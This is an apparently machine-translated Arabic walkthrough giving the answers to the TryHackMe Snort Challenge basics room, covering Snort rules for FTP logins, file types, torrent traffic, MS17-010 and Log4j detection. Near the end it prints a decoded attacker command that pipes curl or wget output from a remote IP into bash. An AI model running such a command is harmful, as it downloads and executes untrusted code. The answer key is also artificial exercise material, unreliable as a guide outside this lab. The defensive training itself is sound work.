لقد قمنا بتغطية استخدام Snort لتحليل حركة مرور FTP وHTTP من خلال إنشاء القواعد المناسبة وتكوينها. لتطبيق ما تعلمناه، قمنا بتحليل لقطات معينة للشبكة باستخدام Snort لاختبار القواعد التي تم إنشاؤها واكتشاف أنماط حركة المرور. كان هذا جزءًا من تحدي TryHackMe Snort – الأساسيات.

ملاحظات دراسة الشخير

دورة Splunk SIEM الكاملة مع سيناريوهات عملية

يسلط الضوء

SNORT هو نظام مفتوح المصدر لكشف التسلل إلى الشبكة ومنعه (NIDS/NIPS). تم تطويره وما زال يحتفظ به مارتن روش، والمساهمون في المصادر المفتوحة، وفريق Cisco Talos. 
قدرات الشخير

  • تحليل حركة المرور الحية
  • كشف الهجوم والتحقيق
  • تسجيل الحزمة
  • تحليل البروتوكول
  • تنبيه في الوقت الحقيقي
  • الوحدات والإضافات
  • المعالجات المسبقة
  • دعم عبر الأنظمة الأساسية! (لينوكس وويندوز)

أوضاع تشغيل Snort IDS

  • وضع الشم – قراءة حزم IP ومطالبتها في تطبيق وحدة التحكم.
  • وضع مسجل الحزم – تسجيل جميع حزم IP (الواردة والصادرة) التي تزور الشبكة.
  • أوضاع NIDS وNIPS: قم بتسجيل/إسقاط الحزم التي تعتبر ضارة وفقًا للقواعد المحددة من قبل المستخدم

إجابات الغرفة | تحدي الشخير - الأساسيات

ما هو عدد الحزم المكتشفة؟

ملحوظة: يجب عليك الإجابة على هذا السؤال بشكل صحيح قبل الإجابة على بقية الأسئلة في هذه المهمة.

328

التحقيق في ملف السجل.

ما هو عنوان الوجهة للحزمة 63؟

145.254.160.237

التحقيق في ملف السجل.

 ما هو رقم ACK للحزمة 64؟

0x38AFFF3

التحقيق في ملف السجل.

ما هو الرقم التسلسلي للحزمة 62؟

0x38AFFF3

دبليو

التحقيق في ملف السجل.

ما هو TTL للحزمة 65؟

128

التحقيق في ملف السجل.

ما هو عنوان IP المصدر للحزمة 65؟

145.254.160.237

التحقيق في ملف السجل.

ما هو المنفذ المصدر للحزمة 65؟

3372

استخدم ملف pcap المحدد.

اكتب قواعد للكشف عن "جميع منافذ TCP 21"حركة المرور في pcap المحدد.

ما هو عدد الحزم المكتشفة؟

614

التحقيق في ملف السجل.

ما هو اسم خدمة FTP؟

خدمة بروتوكول نقل الملفات من ميكروسوفت

امسح ملفات السجل والإنذار السابقة.

إلغاء التنشيط/التعليق على القواعد القديمة.

اكتب قاعدة لاكتشاف محاولات تسجيل الدخول الفاشلة عبر بروتوكول نقل الملفات (FTP) في ملف pcap المحدد.

ما هو عدد الحزم المكتشفة؟

41

امسح ملفات السجل والإنذار السابقة.

إلغاء التنشيط/التعليق على القاعدة القديمة.

اكتب قاعدة لاكتشاف عمليات تسجيل الدخول الناجحة لـ FTP في ملف pcap المحدد.

ما هو عدد الحزم المكتشفة؟

1

امسح ملفات السجل والإنذار السابقة.

إلغاء التنشيط/التعليق على القاعدة القديمة.

اكتب قاعدة للكشف عن الفشل بروتوكول نقل الملفات محاولات تسجيل الدخول باستخدام اسم مستخدم صالح ولكن كلمة مرور سيئة أو بدون كلمة مرور.

ما هو عدد الحزم المكتشفة؟

42

امسح ملفات السجل والإنذار السابقة.

إلغاء التنشيط/التعليق على القاعدة القديمة.

اكتب قاعدة للكشف عن الفشل بروتوكول نقل الملفات محاولات تسجيل الدخول باستخدام اسم المستخدم "المسؤول" ولكن كلمة المرور سيئة أو لا توجد كلمة مرور.

ما هو عدد الحزم المكتشفة؟

7

انتقل إلى مجلد المهام.

استخدم ملف pcap المحدد.

اكتب قاعدة لاكتشاف ملف PNG في ملف pcap المحدد.

تحقق من السجلات وحدد اسم البرنامج المضمن في الحزمة.

أدوبي إيماج ريديك

امسح ملفات السجل والإنذار السابقة.

إلغاء التنشيط/التعليق على القاعدة القديمة.

اكتب قاعدة لاكتشاف ملف GIF في ملف pcap المحدد.

تحقق من السجلات وحدد تنسيق الصورة المضمن في الحزمة.

GIF89a

انتقل إلى مجلد المهام.

استخدم ملف pcap المحدد.

اكتب قاعدة لاكتشاف ملف تعريف التورنت في ملف pcap المحدد.

 ما هو عدد الحزم المكتشفة؟

2

التحقق من ملفات السجل/التنبيه.

ما اسم تطبيق التورنت؟

تورنت

التحقق من ملفات السجل/التنبيه.

ما هو نوع MIME (امتدادات بريد الإنترنت متعددة الأغراض) لملف تعريف التورنت؟

التطبيق/x-bittorrent

التحقق من ملفات السجل/التنبيه.

ما هو اسم المضيف لملف تعريف التورنت؟

Tracker2.torrentbox.com

في هذا القسم، تحتاج إلى إصلاح أخطاء بناء الجملة في ملفات القواعد المحددة. 

يمكنك اختبار كل مجموعة قواعد باستخدام بنية الأوامر التالية؛

sudo snort -c local-X.rules -r mx-1.pcap -A console

أصلح الخطأ النحوي في ملف local-1.rules واجعله يعمل بسلاسة.

ما هو عدد الحزم المكتشفة؟

16

أصلح الخطأ النحوي في ملف local-2.rules واجعله يعمل بسلاسة.

ما هو عدد الحزم المكتشفة؟

68

أصلح الخطأ النحوي في ملف local-3.rules واجعله يعمل بسلاسة.

ما هو عدد الحزم المكتشفة؟

87

أصلح الخطأ النحوي في ملف local-4.rules واجعله يعمل بسلاسة.

ما هو عدد الحزم المكتشفة؟

90

أصلح الخطأ النحوي في ملف local-5.rules واجعله يعمل بسلاسة.

ما هو عدد الحزم المكتشفة؟

155

إصلاح الخطأ المنطقي في ملف local-6.rules وجعله يعمل بسلاسة لإنشاء التنبيهات.

ما هو عدد الحزم المكتشفة؟

2

إصلاح الخطأ المنطقي في ملف local-7.rules وجعله يعمل بسلاسة لإنشاء التنبيهات.

ما اسم الخيار المطلوب :

رسالة

انتقل إلى مجلد المهام.

استخدم ملف pcap المحدد.

استخدم ملف القاعدة المحدد (local.rules) للتحقيق في استغلال ms1710.

ما هو عدد الحزم المكتشفة؟

25154

امسح ملفات السجل والإنذار السابقة.

استخدم ملف local-1.rules الفارغ لكتابة قاعدة جديدة لاكتشاف الحمولات التي تحتوي على الكلمة الأساسية "\IPC$".

ما هو عدد الحزم المكتشفة؟

12

التحقق من ملفات السجل/التنبيه.

ماذا هو المسار المطلوب؟

\192.168.116.138\IPC$

ما هي نتيجة CVSS v2 لثغرة MS17-010؟

9.3

استخدم ملف pcap المحدد.

استخدم ملف القاعدة المحدد (local.rules) للتحقيق في استغلال log4j.

ما هو عدد الحزم المكتشفة؟

26

التحقق من ملفات السجل/التنبيه.

كم عدد القواعد التي تم تفعيلها؟.

4

التحقق من ملفات السجل/التنبيه.

ما هي الأرقام الستة الأولى من القاعدة التي تم تشغيلها؟

210037

امسح ملفات السجل والإنذار السابقة.

استخدم ملف local-1.rules الفارغ لكتابة قاعدة جديدة للكشف عن حمولات الحزم بين 770 و 855 بايت.

ما هو عدد الحزم المكتشفة؟

41

التحقق من ملفات السجل/التنبيه.

ماذا ما هو اسم خوارزمية التشفير المستخدمة؟

base64

التحقق من ملفات السجل/التنبيه.

ماذا هو معرف IP للحزمة المقابلة؟

62808

التحقق من ملفات السجل/التنبيه.

فك تشفير الأمر المشفر.

ما هو أمر المهاجم؟

(curl -s 45.155.205.233:5874/162.0.228.253:80||wget -q -O- 45.155.205.233:5874/162.0.228.253:80)|باش

ما هي نتيجة CVSS v2 لثغرة Log4j؟

9.3

شرح بالفيديو | تحدي TryHackMe Snort – الأساسيات

, , ,
عرض التعليقات

معتصم

عن المؤلف

أقوم بإنشاء ملاحظات حول الأمن السيبراني وملاحظات التسويق الرقمي والدورات التدريبية عبر الإنترنت. أقدم أيضًا استشارات التسويق الرقمي بما في ذلك، على سبيل المثال لا الحصر، تحسين محركات البحث وإعلانات Google وMeta وإدارة CRM.

عرض المقالات